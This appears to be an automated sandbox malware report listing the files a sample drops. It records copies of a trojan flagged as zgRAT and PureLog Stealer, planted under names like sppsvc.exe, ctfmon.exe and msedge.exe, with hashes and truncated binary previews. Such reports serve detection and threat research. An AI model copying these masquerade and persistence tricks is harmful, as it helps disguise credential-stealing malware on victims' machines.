Joe Sandbox View:	Filename: DC86.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9145368354558334
Encrypted:	false
SSDEEP:	48:6xmIstr2xZ8RxeOAkFJOcV4MKe28d0dAvqBHDuulB+hnqXSfbNtm:QsNxvxVx9dvk1TkZzNt
MD5:	FD7EFA7E5A7CFFE81DE60AB2D79B05FB
SHA1:	497CD2E9220688B1693F50098562F21E0A722F91
SHA-256:	631C7796F6E0828C9AD4DCFAFC5B09BEFEE4A21ACB9A6047C8255696E81B0762
SHA-512:	70F4F9D16AFCB25A9A1867B1AEBB198EA60BE42FB6B0A6AEB0C3C91EDC45691C5EA3BC89372EB04F80ECAB465E5DFE26287E0F5964635D771B427840E14D5817
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..g.............................'... ...@....@.. ....................................@.................................h'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..@.............................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID... ... ...#Blob...........WU........%3................................................................

C:\Program Files (x86)\Reference Assemblies\0a1fd5f707cd16

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with very long lines (971), with no line terminators
Category:	dropped
Size (bytes):	971
Entropy (8bit):	5.919742639636077
Encrypted:	false
SSDEEP:	24:OPWQ0gCs3xMCtjfaoAtGEz5iHJrwUIYuPGctspS:0WdgxhFfajGa5gHI2S
MD5:	90927959321DCC695901D4EB440F0ECD
SHA1:	612186F305697ECC0CD8B95015B3F3409DE7DD07
SHA-256:	A99776F090BCCAEFC40917027E98CA02493B71F46D3884630299A7ECBE0342E0
SHA-512:	D8C156E9B665CDE62947B2BFF6A05177BA6D63A6E49E37A69D15C929368C38904B6336433B1E420310E539FB1462BCFAE67113C82F0E4256AD5C33512DC9371F
Malicious:	false
Preview:	lV42xzQTxoa1cpjNdlfxOaPlZBghc69gplsGQpZjCqhOq14G6xQttwtKFTcvSs01o3M16c6xL5vi3B5hHakoqQw31hB6MnQUzqjwpCKe1chxALRDY5o2HLLYGS9Yb9lhpbsMcI2EPGxNt92qQ7iR9XMneKpXCwD119IjcElPCjnBY7pHZTIdbTiROFsRdfBdD6Wt0SOLWTPZuLPhfh7tnjahb1VXWTvhhJ7bk6QGF6GIEIgD0Kv5iSzdgyR970yChr2lNx6jR0nrdRdTURhMi09PUe5voQJOHElWQ50CNMoroIAOV8oqTmeqsmRt2K5ArZjYqHDZae8VLRkLdqaqmc4ej4nnoHKDRoAPilhO5PPzoIfbCFPLuOYOeEywdZvTU5EhQUn1IMvWNF0aZMkj18SCQvvdwvvfe5esE7KsbYChdBBYNXXRzLcVmCReiJEXbQ2RlHWbB1Hc6viOuXPYYdpScJGCqpKSTpGNJuxGB5P7EAY1dCuK3p97kjybBUvVryIRoVFAkJXcOrNcuOin59YopJnj5VErK4QP1HMI6uktSht2VWqwvHaraelfrgFOFqRUb8lnCarLZoWIZuNioR5DeizWfqaapVolPYbXvDuVaOSvIdF7SgjxvOz2IOHV9QfDAu2BSzxlhknPPENCkcHJv10BiiPg5YVJtPvXkEods8PKkknEAEugIWSI40cukQpJOdfASzcgxoawlpa85Kf0nyBW6mdtm42cSG6HEmvKmOtd6fhOaezZvyfabJDqWs33w8eetT3SYUOZFiZbEPTIFcrelfp5jFy4U0r8BDfGkhBakGU3tllGZvxTR93Nn7sSfTEP1baBuMhibQ3eLwL7erfjCXrBJRdmys4QCFCRLkWMNP1AGYC1wvyyyeMduZ1cs5utWmcFt3w4VSWxfq5uOm0D3Gch3jhws3dSeHnd66H284cgIY7DdGNGEr0QK4MKW9LbyDS

C:\Program Files (x86)\Reference Assemblies\sppsvc.exe

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: DC86.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\Program Files (x86)\Reference Assemblies\sppsvc.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Google\Chrome\7d63bcb2074184

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	281
Entropy (8bit):	5.816892921511423
Encrypted:	false
SSDEEP:	6:OuGlUmUnQBP0s2tGo96TiYYCfR6JbhT0uwcbpMfIrXYX2vWA:UrgQBMs2tGeSitMR+R0upbpCXQWA
MD5:	A5657968A68D788B733B8F69B24834F2
SHA1:	1E2DE7032D0442E1D0C928C3D6BCE57F6CCA2D55
SHA-256:	731E6ED396710B6888568478E3481B891A8D1BADE7D69A1102775A88F3B17492
SHA-512:	FECC48F64DEEEB82D49C1912541A7B5CDE42111F6AF2097461541CF4DF1A11348FFA1F2DE64A2F9DFBDA4375B8F193F471140AC1A5D843E4F4A85E027A7CBFAC
Malicious:	false
Preview:	qRChYl9uLDsyV6KsRpZisGG3qQO2d8bytTXpcBgVunCBJ67s4vwqueikKI0IXHQNm3ECifPPJDxFEFtuSf8rLvDPvxeTKX8mWzZP25JYgggqqcgFZGz1JiB10zQuA5FvEKtOpd1WWjLpOXiTRZ4DiHdyyiZCpZYkbvlftRZ5OdfkWWmcQ7dlABN7r4aHEyr7KlNcvDk999yEm3bc56wr5wjZhoyy1S0ZviZvIJrNXdlBMIUxd8LHC9BYBy4HOvIrIZSEepTvPjUbKiNZTAU2GtXwg

C:\Program Files\Google\Chrome\TDdwNhXdQzDImnznNSm.exe

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\Program Files\Google\Chrome\TDdwNhXdQzDImnznNSm.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows Sidebar\Gadgets\7d63bcb2074184

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with very long lines (997), with no line terminators
Category:	dropped
Size (bytes):	997
Entropy (8bit):	5.9028441908534175
Encrypted:	false
SSDEEP:	24:X3aFYKcDLBvHHhU+8eYJoFzyVmPmohOgSgdP2kdVTEh8tvX5f5qu2:X3v5BhXYJ2FzS1kDdBfgu2
MD5:	F387FA58384FC58C24CD1CBD1E8AA7C8
SHA1:	A7ACDF9EA0444C49639881F1ADA817DD350B6CE0
SHA-256:	213E046F2FB3B1B34727145B65A7C96AB4119710807ADC0E8AA282D1FC696EC0
SHA-512:	A1495C201CCEC2A243F96316D2C07CEC47CB9C4B572754DD8C65FB3344AE50FE03D73EFF107597AF9A57F8800C1594505A049C462AD74B8B54E619DBD98960E9
Malicious:	false
Preview:	cgaBlbcCzDl5uS1Y0XH3MTLlSzaoWUvFQefWspJgtuAy2IAvatxhUoxJUzswBxqeRgpQwfqLNlJbSWsJzoNmhOvmqVB36Xf5EfgWdu85ClUteW08Gj7WkD7DvDjaexP0GOWwzWqEqSk54BITfDwXaIVBhdlZKhbPWdmP9DIu22qRdCJt5P5bA1Z72VPWvQ3I1UiaZ2Ub4CehbEhfT1e4mAPfEoWoyv8m8iaIetUC5eg7W1gyxtC3v9g1EDVufqmJE2j3oYBkhb9HdSIMIh0FsF09BiDaXkhP1X3dSmKYscVUAYXw4Jl7zha8Ck1FVkM74tQGYo3gXbWPtf9nLRfO8jaT64bsuFDHQYZQHQXQPEkXKKPgkO3DE78VT7KeNLwRYP9UGsf43P848CIwp4HgL9CSaE7KG3DEST95K4a2s8Kz9EWRyXzSDQFYNq4BvVy9L3lpCNludPxMyMTVrqVsEuBCNlseAYGWKLnFcrOlvFzxc3jAWiTF9F5b2jbbfGuEIaCniO2Abu695NjUBrHbFBXEPMM3PwFoUuoC06bIpTnOJ6fp9Hax9S9HD8XWB9uppRoLihdEQ9vvYI5Tqh4IWSpCuh92iEHqi7j1RUGcnVhAhOt4CDqdEmTWmmaBilfL1ENajEBVbcfAupegyEzfYnm6oMPp3F3BzVIcASV8CUCmGTl6H4MdwAwNcQwWyVbWidKZhBfft0cDl9zVkSi92ZPzi4Aug8Kq3qEmIMZFYqu5hsmcaavgxbdIOV0mBv9uqwK55MMX3ckLpTRzShTFMn2bM5YxWwEnr9PviqhOOXmV0Rc4DAUdb4iC4tt9yYBGX7eqEgRl9F1yBgk4ddtVclLwbM0y7iZzWg83xvzhssdWDtBXJyfUppnvvrP2pdoapBceiqHrnMnuHztrLdoICFKq3MHFg71PDCqBRgzcryqcC2o68hqMygXk1vlVjBLqUXqEIraonMaOYroAiKG8RpahpGKf5d3pnAIoL

C:\Program Files\Windows Sidebar\Gadgets\TDdwNhXdQzDImnznNSm.exe

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\Program Files\Windows Sidebar\Gadgets\TDdwNhXdQzDImnznNSm.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\26c12092da979c

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	158
Entropy (8bit):	5.615617701715535
Encrypted:	false
SSDEEP:	3:5ZIDRv5ekt5Voqk/hjOoc2uXqYSDa+2AUNV6Rj7QfO9pTGlhWBqWK:5ZkLfQ/hKoc2uXqG+2xap7QfO9p6vW4
MD5:	A988B9EF6D5426B7C0057B056A1D2213
SHA1:	BCBACE72EB3AAFBD0668E5AE6A02BE1DA9F7FE85
SHA-256:	9F359BF8C3EDA6CAA6B08271050F6B11D9A9454F209CCCB68329C8C3946FDF07
SHA-512:	D62FF4DF44913C7879810E17786E59F9569B4D67B963332AA1F7245A5A756F085718F99DC5B46AEE0592FDC9C1B07AD094E8DB0C02F92B81B0D21238C29F385D
Malicious:	false
Preview:	MJGkxY4MYp7JZBh4tJSulYjAy9V00PGxcf4AZUqevalcrCJxsMSYUUiykGwxDEVJiJr3HhfYdy9KwGSwziHo6sdH7GaSi2bqEb4hUPpLq45gVXBdx98e6rNzpk6BHN0kWSGULvbj267Cw7wkE6ej47uXOE1uTo

C:\Recovery\ctfmon.exe

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ctfmon.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\Recovery\ctfmon.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TDdwNhXdQzDImnznNSm.exe.log

Download File

Process:	C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	937
Entropy (8bit):	5.349223382123555
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4j:MxHKQwYHKGSI6oPtHTHhAHKKkrJHj
MD5:	A7A79F5E708AD9CAB746BB7FD694DE94
SHA1:	BEA03282D7C7E14D3F37ACE7DB0D02070E43D8DC
SHA-256:	43680EAC54990184C4CC5E6F96D3607592E719736A3A525CBACB9E414FD1B161
SHA-512:	E4A6FA109DE5520CD3BF0A3E4F8E73238DF35D1827E679B49D986CA04D1435A964A667703B14168C057C59D3BBA5F43A6624206B52B3F066373461D47A390236
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\VIyu4dC9CU.exe.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ctfmon.exe.log

Download File

Process:	C:\Recovery\ctfmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1830
Entropy (8bit):	5.3661116947161815
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktJtpaqZ4vwmj0K
MD5:	C2E0F17D6A14A9837FE55EE183305037
SHA1:	EB56F87DAE280A52D91E88872777FDEEB2E1DF76
SHA-256:	8D444C9F4CB992629221443E699471F7D71BA2F0FFFC1F9BEBBA9D2F18371D47
SHA-512:	F4C96FF497F0AF4756F6A65350B2F9CF3AE54CEF07E38FDF31AC653765F731256D2625E287C6AC3471A87297CC51EF4D37E857C7F51D4735681B20F0B376D855
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicK

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sppsvc.exe.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	937
Entropy (8bit):	5.349223382123555
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4j:MxHKQwYHKGSI6oPtHTHhAHKKkrJHj
MD5:	A7A79F5E708AD9CAB746BB7FD694DE94
SHA1:	BEA03282D7C7E14D3F37ACE7DB0D02070E43D8DC
SHA-256:	43680EAC54990184C4CC5E6F96D3607592E719736A3A525CBACB9E414FD1B161
